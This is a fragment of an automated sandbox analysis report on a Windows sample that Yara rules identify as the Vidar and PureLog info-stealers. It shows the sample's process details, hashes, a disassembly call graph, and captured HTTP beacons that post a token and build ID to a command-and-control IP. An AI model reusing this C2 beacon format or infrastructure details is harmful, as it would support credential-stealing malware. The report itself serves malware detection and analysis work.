                                                                                                                                                                                                                                            Data Ascii: m0OfVj1P41y9FFkO7CiiimIx6KKKYjpb74geLL2/ubv/hIdUt/PlaTyYL2VI49xJ2qu7hRnAHpUE/i/Vru7tru8m+13MFhNYCa4Z3d45RKCWYtksBMwHYYXg45waKVkO7CiiigQUUUUwPS7j4o29/Bbx3GnTQeQgUGOQPu4HrjHT3qa4+LNreW/2d9DMCnrIkwYjHPTaP515dRWCw1KKpxS0pu8dXu3fvrr3Lc5Nzb+3o/usdv4l8fR654bXRYr
                                                                                                                                                                                                                                            2024-04-18 08:10:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:53 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            22192.168.2.44975965.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:54 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDB
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 43 41 46 48 49 4a 45 43 47 43 41 4b 46 43 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 41 46 48 49 4a 45 43 47 43 41 4b 46 43 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 41 46 48 49 4a 45 43 47 43 41 4b 46 43 47 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------KEHCAFHIJECGCAKFCGDBContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------KEHCAFHIJECGCAKFCGDBContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------KEHCAFHIJECGCAKFCGDBCont
                                                                                                                                                                                                                                            2024-04-18 08:10:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            23192.168.2.44976065.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:55 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------DHDHCGHDHIDHCBGCBGCACont
                                                                                                                                                                                                                                            2024-04-18 08:10:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:10:10:14
                                                                                                                                                                                                                                            Start date:18/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\YyIDUCFWC1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\YyIDUCFWC1.exe"
                                                                                                                                                                                                                                            Imagebase:0x680000
                                                                                                                                                                                                                                            File size:4'479'608 bytes
                                                                                                                                                                                                                                            MD5 hash:6D59B75F2B8BF7590C144CD4B3D24516
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:10:10:15
                                                                                                                                                                                                                                            Start date:18/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                                                                                                                                                            Imagebase:0x830000
                                                                                                                                                                                                                                            File size:262'432 bytes
                                                                                                                                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:7.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:13.4%
                                                                                                                                                                                                                                              Signature Coverage:5.8%
                                                                                                                                                                                                                                              Total number of Nodes:1204
                                                                                                                                                                                                                                              Total number of Limit Nodes:62
                                                                                                                                                                                                                                              execution_graph 58857 6cefe2ce 58858 6cf39bb5 77 API calls 58857->58858 58859 6cefe2d5 58858->58859 58860 6cefe2ee 58859->58860 58914 6cf01fd0 58859->58914 58862 6cf39bb5 77 API calls 58860->58862 58873 6cefe343 58860->58873 58865 6cefe327 58862->58865 58863 6cefe3a6 58868 6cf39bb5 77 API calls 58863->58868 58913 6cefe564 moneypunct 58863->58913 58864 6cefe360 58866 6cf39bb5 77 API calls 58864->58866 58939 6cefeae0 58865->58939 58869 6cefe367 58866->58869 58867 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58870 6cefe76e 58867->58870 58872 6cefe400 58868->58872 58954 6cf01910 78 API calls 2 library calls 58869->58954 58876 6cf39bb5 77 API calls 58872->58876 58873->58863 58873->58864 58875 6cefe384 58955 6cf01b20 11 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 58875->58955 58878 6cefe428 58876->58878 58880 6cee5050 77 API calls 58878->58880 58879 6cefe399 58879->58863 58881 6cefe442 58880->58881 58882 6cf39bb5 77 API calls 58881->58882 58883 6cefe449 58882->58883 58884 6cee5050 77 API calls 58883->58884 58885 6cefe463 58884->58885 58886 6cf39bb5 77 API calls 58885->58886 58887 6cefe46a 58886->58887 58888 6cee5050 77 API calls 58887->58888 58889 6cefe484 58888->58889 58890 6cf39bb5 77 API calls 58889->58890 58891 6cefe48b 58890->58891 58892 6cee5050 77 API calls 58891->58892 58893 6cefe4a5 58892->58893 58894 6cf39bb5 77 API calls 58893->58894 58895 6cefe4ac 58894->58895 58896 6cee5050 77 API calls 58895->58896 58897 6cefe4c6 58896->58897 58898 6cefe4d3 58897->58898 58956 6cf3919e 67 API calls 3 library calls 58897->58956 58900 6cf39bb5 77 API calls 58898->58900 58901 6cefe4e3 58900->58901 58902 6cee5050 77 API calls 58901->58902 58903 6cefe4fd 58902->58903 58904 6cf39bb5 77 API calls 58903->58904 58905 6cefe504 58904->58905 58906 6cee5050 77 API calls 58905->58906 58907 6cefe51e 58906->58907 58908 6cf39bb5 77 API calls 58907->58908 58909 6cefe525 58908->58909 58910 6cee5050 77 API calls 58909->58910 58911 6cefe53f 58910->58911 58912 6cee16b0 327 API calls 58911->58912 58912->58913 58913->58867 58915 6cf39bb5 77 API calls 58914->58915 58916 6cf02013 58915->58916 58917 6cf02020 58916->58917 58918 6cf021f3 58916->58918 58957 6cf06480 58917->58957 58991 6cf39533 66 API calls std::exception::_Copy_str 58918->58991 58921 6cf0220b 58992 6cf3ac75 RaiseException 58921->58992 58923 6cf02226 58924 6cf0206c 58973 6ced35f0 58924->58973 58926 6cf0216e 58984 6cf02300 58926->58984 58928 6cf02194 58929 6cf02300 77 API calls 58928->58929 58930 6cf021a0 58929->58930 58931 6cf02300 77 API calls 58930->58931 58932 6cf021ad 58931->58932 58933 6cf02300 77 API calls 58932->58933 58934 6cf021ba 58933->58934 58935 6cf02300 77 API calls 58934->58935 58936 6cf021c6 58935->58936 58937 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58936->58937 58938 6cf021ef 58937->58938 58938->58860 58940 6cf39bb5 77 API calls 58939->58940 58941 6cefeb17 58940->58941 58942 6ceff4c9 58941->58942 58943 6cefeb22 58941->58943 59045 6cf39533 66 API calls std::exception::_Copy_str 58942->59045 59037 6cf3a25a GetSystemTimeAsFileTime 58943->59037 58945 6ceff4dc 59046 6cf3ac75 RaiseException 58945->59046 58948 6cefeb5b 59039 6cf39dfa 58948->59039 58949 6ceff4f1 58954->58875 58955->58879 58956->58898 58958 6cf0655d 58957->58958 58961 6cf064c8 58957->58961 58959 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58958->58959 58960 6cf0657d 58959->58960 58960->58924 58961->58958 58962 6cf0651d 58961->58962 58993 6ced2f40 77 API calls 58961->58993 58962->58958 58996 6ced2f40 77 API calls 58962->58996 58965 6cf06535 58997 6cf06400 77 API calls std::tr1::_Xweak 58965->58997 58966 6cf064f5 58994 6cf06400 77 API calls std::tr1::_Xweak 58966->58994 58969 6cf0654e 58998 6cf3ac75 RaiseException 58969->58998 58970 6cf0650e 58995 6cf3ac75 RaiseException 58970->58995 58999 6cf26d40 58973->58999 58976 6cf06480 77 API calls 58977 6ced364c 58976->58977 59006 6ced4b30 58977->59006 58979 6ced36a7 59010 6cf086e0 58979->59010 58981 6ced36bc 58982 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 58981->58982 58983 6ced3701 58982->58983 58983->58926 58985 6cf0231d 58984->58985 58986 6cf023aa 58985->58986 58987 6cf39bb5 77 API calls 58985->58987 58986->58928 58989 6cf02331 58987->58989 58988 6cf02374 moneypunct 58988->58928 58989->58988 59036 6cf02480 77 API calls 58989->59036 58991->58921 58992->58923 58993->58966 58994->58970 58995->58962 58996->58965 58997->58969 58998->58958 59000 6cf06480 77 API calls 58999->59000 59001 6cf26d7f 59000->59001 59018 6cf08d80 59001->59018 59004 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 59005 6ced3630 59004->59005 59005->58976 59007 6ced4b65 59006->59007 59028 6ced4fa0 59007->59028 59009 6ced4b7f 59009->58979 59014 6cf08728 59010->59014 59011 6cf08765 59012 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 59011->59012 59013 6cf0878a 59012->59013 59013->58981 59014->59011 59034 6cf07cd0 77 API calls 3 library calls 59014->59034 59016 6cf08756 59035 6cf3ac75 RaiseException 59016->59035 59019 6cf39d66 _malloc 66 API calls 59018->59019 59022 6cf08d8f 59019->59022 59020 6cf08dbb 59020->59004 59021 6cf391f6 70 API calls 59021->59022 59022->59020 59022->59021 59023 6cf08dc1 std::exception::exception 59022->59023 59026 6cf39d66 _malloc 66 API calls 59022->59026 59027 6cf3ac75 RaiseException 59023->59027 59025 6cf08df0 59026->59022 59027->59025 59029 6cf39bb5 77 API calls 59028->59029 59030 6ced4fcf 59029->59030 59031 6ced4ff1 59030->59031 59033 6ced5050 81 API calls _memcpy_s 59030->59033 59031->59009 59033->59031 59034->59016 59035->59011 59036->58986 59038 6cf3a28a __aulldiv 59037->59038 59038->58948 59047 6cf3eae6 59039->59047 59042 6cf39e0c 59043 6cf3eae6 __getptd 66 API calls 59042->59043 59044 6cefeb69 59043->59044 59044->58873 59045->58945 59046->58949 59052 6cf3ea6d GetLastError 59047->59052 59049 6cf3eaee 59050 6cefeb61 59049->59050 59067 6cf3d4f6 66 API calls 3 library calls 59049->59067 59050->59042 59053 6cf3e948 ___set_flsgetvalue 3 API calls 59052->59053 59054 6cf3ea84 59053->59054 59055 6cf3eada SetLastError 59054->59055 59056 6cf3ea8c 59054->59056 59055->59049 59068 6cf3cb28 66 API calls __calloc_crt 59056->59068 59058 6cf3ea98 59058->59055 59059 6cf3eaa0 DecodePointer 59058->59059 59060 6cf3eab5 59059->59060 59061 6cf3ead1 59060->59061 59062 6cf3eab9 59060->59062 59070 6cf39d2c 66 API calls 2 library calls 59061->59070 59069 6cf3e9b9 66 API calls 4 library calls 59062->59069 59065 6cf3eac1 GetCurrentThreadId 59065->59055 59066 6cf3ead7 59066->59055 59068->59058 59069->59065 59070->59066 59071 6cf3a510 59074 6cf3fe93 59071->59074 59073 6cf3a515 59075 6cf3fec5 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 59074->59075 59076 6cf3feb8 59074->59076 59077 6cf3ff04 59075->59077 59076->59075 59078 6cf3febc 59076->59078 59077->59078 59078->59073 59102 6cef9357 59103 6cef9368 59102->59103 59239 6cef69c0 59103->59239 59105 6cefae68 59108 6cefae7b 59105->59108 59109 6cefae72 SafeArrayDestroy 59105->59109 59106 6cefae62 SafeArrayDestroy 59106->59105 59107 6cef93ac 59110 6cef69c0 11 API calls 59107->59110 59161 6cef8739 59107->59161 59111 6cefae8e 59108->59111 59112 6cefae85 SafeArrayDestroy 59108->59112 59109->59108 59121 6cef943a 59110->59121 59113 6cefae98 SafeArrayDestroy 59111->59113 59114 6cefaea1 59111->59114 59112->59111 59113->59114 59115 6cefaeab SafeArrayDestroy 59114->59115 59116 6cefaeb4 59114->59116 59115->59116 59117 6cefaebe SafeArrayDestroy 59116->59117 59118 6cefaec7 59116->59118 59117->59118 59119 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 59118->59119 59120 6cefaef5 59119->59120 59122 6cef94b1 SafeArrayGetLBound SafeArrayGetUBound 59121->59122 59121->59161 59123 6cef9658 59122->59123 59129 6cef94ef 59122->59129 59246 6ceed920 59123->59246 59125 6cef94fd SafeArrayGetElement 59125->59129 59125->59161 59126 6cef840e 59126->59161 59295 6ceedfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59126->59295 59128 6cef8441 59130 6cef84af SafeArrayGetLBound SafeArrayGetUBound 59128->59130 59128->59161 59129->59123 59129->59125 59129->59126 59129->59161 59131 6cef84ed SafeArrayGetElement 59130->59131 59132 6cef8616 59130->59132 59146 6cef8518 59131->59146 59131->59161 59296 6ceedfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59132->59296 59134 6cef862b 59134->59161 59297 6ceedfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59134->59297 59135 6cef968f 59138 6cef9794 SafeArrayGetLBound SafeArrayGetUBound 59135->59138 59135->59161 59137 6cef864b 59137->59161 59298 6ceedfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59137->59298 59149 6cef9c5e 59138->59149 59160 6cef97d2 59138->59160 59140 6cef3a90 8 API calls 59140->59146 59141 6cef866b 59141->59161 59299 6ceedfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59141->59299 59142 6cef97e3 SafeArrayGetElement 59142->59160 59142->59161 59143 6ceed920 3 API calls 59151 6cef9cf8 59143->59151 59145 6cef868a 59145->59161 59300 6ceedfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59145->59300 59146->59131 59146->59132 59146->59140 59148 6cef86aa 59150 6cef69c0 11 API calls 59148->59150 59148->59161 59149->59143 59152 6cef86cf 59150->59152 59155 6cef9d4f SafeArrayGetLBound SafeArrayGetUBound 59151->59155 59151->59161 59153 6cef69c0 11 API calls 59152->59153 59152->59161 59154 6cef86f5 59153->59154 59158 6cef69c0 11 API calls 59154->59158 59154->59161 59156 6cef9ec7 59155->59156 59165 6cef9d8d 59155->59165 59159 6ceed920 3 API calls 59156->59159 59157 6cef9da0 SafeArrayGetElement 59157->59161 59157->59165 59158->59161 59162 6cef9f09 59159->59162 59160->59126 59160->59142 59160->59149 59170 6cef3a90 8 API calls 59160->59170 59161->59105 59161->59106 59162->59161 59164 6ceed920 3 API calls 59162->59164 59163 6cef3a90 8 API calls 59163->59165 59166 6cef9f8b 59164->59166 59165->59156 59165->59157 59165->59163 59166->59161 59167 6ceed920 3 API calls 59166->59167 59168 6cefa01f 59167->59168 59168->59161 59169 6ceed920 3 API calls 59168->59169 59171 6cefa09b 59169->59171 59170->59160 59171->59161 59172 6cefa1ac SafeArrayGetLBound SafeArrayGetUBound 59171->59172 59173 6cefa7b3 59172->59173 59188 6cefa1ea 59172->59188 59174 6ceed920 3 API calls 59173->59174 59176 6cefa7ce 59174->59176 59175 6cefa1fd SafeArrayGetElement 59178 6cefa815 59175->59178 59175->59188 59176->59161 59177 6ceed920 3 API calls 59176->59177 59177->59178 59178->59161 59254 6cef64d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 59178->59254 59179 6cef3a90 8 API calls 59179->59188 59181 6cefa91d 59181->59161 59182 6cef64d0 109 API calls 59181->59182 59183 6cefa950 59182->59183 59183->59161 59184 6cef64d0 109 API calls 59183->59184 59185 6cefa983 59184->59185 59185->59161 59186 6cef64d0 109 API calls 59185->59186 59187 6cefa9b6 59186->59187 59187->59161 59189 6cef64d0 109 API calls 59187->59189 59188->59173 59188->59175 59188->59179 59190 6cefa9e9 59189->59190 59190->59161 59191 6cef64d0 109 API calls 59190->59191 59192 6cefaa1c 59191->59192 59192->59161 59193 6cef64d0 109 API calls 59192->59193 59194 6cefaa4f 59193->59194 59194->59161 59195 6cef64d0 109 API calls 59194->59195 59196 6cefaa82 59195->59196 59196->59161 59197 6cef64d0 109 API calls 59196->59197 59198 6cefaab5 59197->59198 59198->59161 59199 6cef64d0 109 API calls 59198->59199 59200 6cefaae8 59199->59200 59200->59161 59201 6cef64d0 109 API calls 59200->59201 59202 6cefab1e 59201->59202 59202->59161 59203 6cefabd0 59202->59203 59206 6cefac5a 59202->59206 59268 6cef2970 59203->59268 59301 6cefd790 77 API calls 3 library calls 59206->59301 59209 6cefac37 59209->59161 59302 6cee1690 77 API calls 59209->59302 59211 6cefad36 59303 6cee50c0 77 API calls 59211->59303 59213 6cefad4d 59214 6cf39bb5 77 API calls 59213->59214 59215 6cefad5d 59214->59215 59216 6cee5050 77 API calls 59215->59216 59217 6cefad77 59216->59217 59304 6cee50c0 77 API calls 59217->59304 59219 6cefad82 59220 6cf39bb5 77 API calls 59219->59220 59221 6cefad89 59220->59221 59222 6cee5050 77 API calls 59221->59222 59223 6cefada7 59222->59223 59224 6cf39bb5 77 API calls 59223->59224 59225 6cefadae 59224->59225 59226 6cee5050 77 API calls 59225->59226 59227 6cefadcc 59226->59227 59305 6cee50c0 77 API calls 59227->59305 59229 6cefadd7 59230 6cf39bb5 77 API calls 59229->59230 59231 6cefade1 59230->59231 59232 6cee5050 77 API calls 59231->59232 59233 6cefadfb 59232->59233 59306 6cee50c0 77 API calls 59233->59306 59235 6cefae06 59307 6cee50c0 77 API calls 59235->59307 59237 6cefae11 59308 6cee2a40 327 API calls 59237->59308 59240 6cef69f3 59239->59240 59241 6cef6a01 SafeArrayGetLBound SafeArrayGetUBound 59239->59241 59240->59241 59242 6cef6a92 59241->59242 59245 6cef6a2a 59241->59245 59242->59107 59243 6cef6a30 SafeArrayGetElement 59243->59242 59243->59245 59245->59242 59245->59243 59309 6cef3990 8 API calls 59245->59309 59247 6ceed936 59246->59247 59248 6ceed944 SafeArrayCreateVector 59246->59248 59247->59248 59250 6ceed981 59248->59250 59251 6ceed95a 59248->59251 59249 6ceed960 SafeArrayPutElement 59249->59250 59249->59251 59252 6ceed9ce SafeArrayDestroy 59250->59252 59253 6ceed9d5 59250->59253 59251->59249 59251->59250 59252->59253 59253->59135 59255 6cef655c SafeArrayPutElement VariantClear 59254->59255 59256 6cef6554 59254->59256 59258 6cef6584 SafeArrayPutElement VariantClear 59255->59258 59267 6cef6655 59255->59267 59256->59255 59261 6cef65cd 59258->59261 59258->59267 59259 6cef666c VariantClear VariantClear VariantClear 59259->59181 59260 6cef6665 SafeArrayDestroy 59260->59259 59261->59267 59310 6ceedb30 VariantInit SafeArrayCreateVector SafeArrayPutElement 59261->59310 59263 6cef663a 59263->59267 59314 6cef56b0 59263->59314 59267->59259 59267->59260 59278 6cef29c3 59268->59278 59269 6cef29ee SafeArrayGetLBound SafeArrayGetUBound 59272 6cef2a20 SafeArrayGetElement 59269->59272 59276 6cef2c53 59269->59276 59270 6cef2d21 59270->59161 59282 6cefd2e0 59270->59282 59271 6cef2d1a SafeArrayDestroy 59271->59270 59272->59276 59272->59278 59273 6cef2ab6 VariantInit 59273->59278 59274 6cef2c8b VariantClear VariantClear 59274->59276 59275 6cef2b3a VariantInit 59275->59278 59276->59270 59276->59271 59277 6cef2d3a VariantClear VariantClear VariantClear 59277->59276 59278->59269 59278->59270 59278->59272 59278->59273 59278->59274 59278->59275 59278->59276 59278->59277 59279 6cef2bf9 VariantClear VariantClear VariantClear 59278->59279 59280 6cef2cb6 VariantClear VariantClear VariantClear 59278->59280 59279->59278 59280->59276 59283 6cf39bb5 77 API calls 59282->59283 59284 6cefd32f 59283->59284 59285 6cefd33e 59284->59285 59286 6cefd3db 59284->59286 59332 6cefc530 VariantInit VariantInit SafeArrayCreateVector 59285->59332 59343 6cf39533 66 API calls std::exception::_Copy_str 59286->59343 59288 6cefd3ed 59344 6cf3ac75 RaiseException 59288->59344 59291 6cefd404 59293 6cf3948b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 59294 6cefd3d5 59293->59294 59294->59209 59295->59128 59296->59134 59297->59137 59298->59141 59299->59145 59300->59148 59301->59209 59302->59211 59303->59213 59304->59219 59305->59229 59306->59235 59307->59237 59308->59161 59309->59245 59313 6ceedb8c 59310->59313 59311 6ceedbf7 VariantClear 59311->59263 59312 6ceedbf0 SafeArrayDestroy 59312->59311 59313->59311 59313->59312 59315 6cef56e0 59314->59315 59316 6cef56f4 59314->59316 59315->59316 59329 6cef57c0 81 API calls std::_Xinvalid_argument 59315->59329 59319 6cef570d VariantInit VariantCopy 59316->59319 59320 6cef5744 59316->59320 59330 6cef57c0 81 API calls std::_Xinvalid_argument 59316->59330 59319->59316 59319->59320 59321 6cef6880 VariantInit VariantInit 59320->59321 59331 6cf391e1 59321->59331 59323 6cef68cd SafeArrayCreateVector SafeArrayPutElement VariantClear 59324 6cef6913 SafeArrayPutElement 59323->59324 59328 6cef692d 59323->59328 59324->59328 59325 6cef6987 59327 6cef6994 VariantClear VariantClear 59325->59327 59326 6cef6980 SafeArrayDestroy 59326->59325 59327->59267 59328->59325 59328->59326 59329->59316 59330->59316 59333 6cefc5ac SafeArrayPutElement VariantClear 59332->59333 59334 6cefc5a4 59332->59334 59338 6cefc5cf 59333->59338 59341 6cefc7e4 59333->59341 59334->59333 59335 6cefc7f7 VariantClear VariantClear 59337 6cefc817 59335->59337 59336 6cefc7f0 SafeArrayDestroy 59336->59335 59337->59293 59339 6cefc7d9 59338->59339 59338->59341 59348 6cf3919e 67 API calls 3 library calls 59338->59348 59345 6cefdf70 59339->59345 59341->59335 59341->59336 59343->59288 59344->59291 59349 6cefd410 59345->59349 59347 6cefdf80 59347->59341 59348->59339 59350 6cefd472 VariantInit VariantInit VariantInit 59349->59350 59351 6cefd44e _memmove 59349->59351 59350->59351 59351->59347 59351->59350 59352 6cefd704 VariantClear VariantClear VariantClear 59351->59352 59353 6cf39d66 _malloc 66 API calls 59351->59353 59354 